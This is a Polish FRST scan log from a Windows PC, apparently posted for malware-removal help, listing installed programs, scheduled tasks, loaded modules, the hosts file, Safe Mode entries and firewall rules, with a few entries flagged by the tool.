abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.08.2003.3 - Acer Incorporated)
Acer Care Center (HKLM\...\{1AF41E84-3408-499A-8C93-8891F0612719}) (Version: 2.00.3024 - Acer Incorporated)
Acer Configuration Manager (HKLM-x32\...\{414D554E-4453-454E-0201-000000016258}) (Version: 2.1.16258 - Acer)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.08.2006 - Acer Incorporated)
Acer Quick Access (HKLM\...\{8BBF04F1-C68A-441C-B5EF-446EE9960EAF}) (Version: 2.01.3003 - Acer Incorporated)
Acer UEIP Framework (HKLM\...\{12A718F2-2357-4D41-9E1F-18583A4745F7}) (Version: 3.01.3001 - Acer Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Reader 9.5.0 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A95000000001}) (Version: 9.5.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
Aktualizacje NVIDIA 2.11.4.1 (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
AlphaGo (HKLM-x32\...\{E1AF73C7-0C82-4D66-829E-16B29FBBF384}) (Version: 1.1.7 - AlphaGo)
Amazon Assistant (HKLM-x32\...\{5437E77B-E4B5-45E7-BD33-95C3F0AA6602}) (Version: 10.17.0228 - Amazon) <==== UWAGA
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.22.2001.0 - Acer Incorporated)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BitComet 1.44 (HKLM-x32\...\BitComet_x64) (Version: 1.44 - CometNetwork)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5917.02 - CyberLink Corp.)
Dashlane Upgrade Service (HKLM-x32\...\Dashlane Upgrade Service) (Version: 2.0.14.0 - Dashlane SAS)
DLL-Files.com Client (HKLM-x32\...\DA71BA65-680A-4212-9150-6239217B53DC_DLL-Files.c~79141F26_is1) (Version: 2.1.1000.4462 - DLL-Files.com Client)
Emergency 2017 (HKLM-x32\...\Emergency 2017_is1) (Version:  - )
Farm Expert 2017 (HKLM-x32\...\Farm Expert 2017_is1) (Version:  - )
Farming Simulator 17 (HKLM\...\ZmFybWluZ3NpbXVsYXRvcjE3_is1) (Version: 1 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Game Explorer Categories - genres (HKLM-x32\...\WildTangentGameProvider-acer-genres) (Version: 13.0.0.6 - WildTangent, Inc.)
Game Explorer Categories - main (HKLM-x32\...\WildTangentGameProvider-acer-main) (Version: 13.0.0.6 - WildTangent, Inc.)
GG (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\GG) (Version: 12 - GG Network S.A.)
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.9.108.1 - Intel Security)
Intel(R) Chipset Device Software (x32 Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Magic Academy (x32 Version: 2.2.0.97 - WildTangent) Hidden
Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
McAfee LiveSafe  (HKLM-x32\...\MSC) (Version: 14.0.12000 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.523.1 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.127 - McAfee, Inc.)
Microsoft Office 365 - pl-pl (HKLM\...\O365HomePremRetail - pl-pl) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 53.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pl)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.0.6312 - Mozilla)
My Connection (HKLM-x32\...\My Connection_is1) (Version:  - TCT Mobile Limited)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
NVIDIA Sterownik graficzny 376.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.54 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenFM (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OpenFM) (Version: 4.0.0.1 - Grupa Wirtualna Polska)
Opera Stable 44.0.2510.23876 (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Opera 44.0.2510.23876) (Version: 44.0.2510.23876 - Opera Software)
Panel sterowania NVIDIA 376.54 (Version: 376.54 - NVIDIA Corporation) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{3241744A-BA36-41F0-B4AA-EF3946D00632}) (Version: 11.0.0.10164 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7553 - Realtek Semiconductor Corp.)
Rory's Restaurant (x32 Version: 3.0.2.126 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Sylenth1 v2.21 (HKLM-x32\...\Sylenth1_is1) (Version:  - )
The Sims 4 (HKLM-x32\...\VGhlU2ltczQ=_is1) (Version: 1 - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.732.20 - Electronic Arts Inc.)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vegas World (x32 Version: 13.0.0.6 - WildTangent) Hidden
Villagers and Heroes (x32 Version: 13.0.0.6 - WildTangent) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.1.1.12 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.1.1.30 - WildTangent) Hidden
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wolfenstein - Enemy Territory (HKLM-x32\...\Wolfenstein - Enemy Territory) (Version: 2.60b - ACTIVISION)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Emil\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {0481BC6E-5635-4CA5-9A47-AC5F661D507F} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2016-01-20] ()
Task: {2C9972C8-3D95-4A9B-A219-F054CF4EE38B} - System32\Tasks\Opera scheduled Autoupdate 1491594233 => C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe [2017-04-03] (Opera Software)
Task: {355F852A-7001-4393-A65A-7457F7E17AF9} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [2016-01-20] ()
Task: {5A8C5CDE-3D27-4211-A3B4-D4A8D5FBB8DA} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-08-30] (Acer Incorporated)
Task: {68101486-37B2-4A57-BD29-157B1BDCB7BE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {88DA94EF-75F4-4927-92C9-E1BB628FC2FC} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [2016-03-11] (Acer Incorporated)
Task: {8985ED19-C2F3-44C5-A1BD-53732428A47C} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {941500AD-B8E6-4F99-BEDE-E4AD314D89A6} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [2016-09-20] ()
Task: {982E8A31-B494-42FC-8CFE-1062953DD965} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2015-10-15] (Acer)
Task: {9DDAE723-7705-4F4B-8206-8A0F5777B03B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-12-09] (McAfee, Inc.)
Task: {B0A1AD74-05A7-4252-8130-70601E0180A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [2014-03-13] (TODO: <Company name>)
Task: {C1F9446B-E21E-4DBA-A51F-781328F68EED} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C3CD0E51-E4FD-4B31-8D43-B10133E5F7A8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C6BE5F7A-AEF4-4E7F-BA77-65278F5DF390} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {C708875B-767C-4C17-A8F3-15FDF2DBA081} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {E28D7D70-5F9A-4819-90B5-C2819368534A} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [2016-01-20] ()
Task: {E424E08F-0CA7-43E4-9179-3D1F28CE22E7} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2016-03-11] (Acer Incorporated)
Task: {E4277888-B743-4447-A51A-1CAB692AB3B0} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [2015-05-14] ()
Task: {E8BCC90F-4ABE-4718-94CA-AE966B585237} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {EE25942B-2B8E-47DD-AA83-BB4742384668} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {FC3626F8-D2BF-44C6-BCED-EA83613E8F51} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)


==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507

==================== Załadowane moduły (filtrowane) ==============

2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-02-28 16:19 - 2017-02-28 16:19 - 00102064 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
2017-02-28 16:20 - 2017-02-28 16:20 - 00141488 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader64.dll
2015-05-19 18:11 - 2015-05-19 18:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2017-02-03 17:07 - 2015-09-24 15:57 - 00574464 _____ () C:\Program Files (x86)\My Connection\ApplicationController.exe
2016-11-25 17:36 - 2016-06-15 03:14 - 00369208 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00289848 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 03613240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-12-07 17:34 - 2016-12-07 17:34 - 00066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-12-07 17:34 - 2016-12-07 17:34 - 00107832 _____ () C:\WINDOWS\SysWOW64\PnkBstrB.exe
2017-04-19 18:33 - 2017-04-20 20:20 - 02271520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-04-19 18:33 - 2017-04-20 20:20 - 02267600 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-03-01 12:13 - 2016-12-29 15:16 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 02667576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01990200 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01842232 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 00208952 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00035896 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00921656 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-11-21 10:41 - 2016-11-21 10:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 22:30 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 22:31 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 22:31 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 22:31 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 11:10 - 2017-03-28 07:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 11:10 - 2017-03-28 07:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-10 20:11 - 2017-04-10 20:15 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 20:11 - 2017-04-10 20:15 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-10 20:11 - 2017-04-10 20:15 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-10 20:11 - 2017-04-10 20:15 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2016-08-18 10:02 - 2015-05-14 09:10 - 00030976 _____ () C:\OEM\Preload\FubTracking\FubTracking.exe
2016-08-18 09:12 - 2015-02-09 05:18 - 00124440 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2017-04-12 11:10 - 2017-03-28 08:26 - 03388256 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2017-04-08 18:19 - 2017-04-08 18:20 - 02567168 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.2.831.0_x64__8wekyb3d8bbwe\People.BackgroundTasks.dll
2017-04-08 18:19 - 2017-04-08 18:20 - 00138752 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.2.831.0_x64__8wekyb3d8bbwe\PeopleUtilRT.Windows.dll
2017-04-05 17:26 - 2017-04-05 17:27 - 00055808 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.99.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll
2017-02-03 17:07 - 2014-11-13 17:52 - 00011362 _____ () C:\Program Files (x86)\My Connection\mingwm10.dll
2017-02-03 17:07 - 2014-11-13 17:52 - 00043008 _____ () C:\Program Files (x86)\My Connection\libgcc_s_dw2-1.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 02537472 _____ () C:\Program Files (x86)\My Connection\QtCore4.dll
2017-02-03 17:07 - 2015-09-24 15:55 - 01054208 _____ () C:\Program Files (x86)\My Connection\Common.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 09814016 _____ () C:\Program Files (x86)\My Connection\QtGui4.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 01140224 _____ () C:\Program Files (x86)\My Connection\QtNetwork4.dll
2016-08-18 09:33 - 2016-06-15 03:14 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2017-02-28 16:23 - 2017-02-28 16:23 - 00116912 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader.dll
2015-06-24 10:07 - 2015-06-24 10:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-08-15 19:03 - 2016-08-15 19:03 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2016-08-15 19:04 - 2016-08-15 19:04 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
2017-03-01 12:23 - 2017-03-01 12:23 - 00015064 _____ () C:\WINDOWS\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-08-30 16:09 - 2016-08-30 16:09 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-08-30 16:05 - 2016-08-30 16:05 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00201568 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00118112 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll
2016-09-20 11:20 - 2016-09-20 11:20 - 00152880 _____ () C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\amazon.com -> hxxps://amazon.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2015-10-30 09:24 - 2017-04-02 23:15 - 00000861 ____A C:\WINDOWS\system32\Drivers\etc\hosts


0.0.0.1   mssplus.mcafee.com

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Control Panel\Desktop\\Wallpaper -> c:\users\emil\desktop\zdjęcia\12986483_239163373105190_1185582304_o.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{039F9D25-EDED-4A9C-AFD7-90C3534D04D7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{A5AA757B-C1ED-415E-B787-E6597951AAF3}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
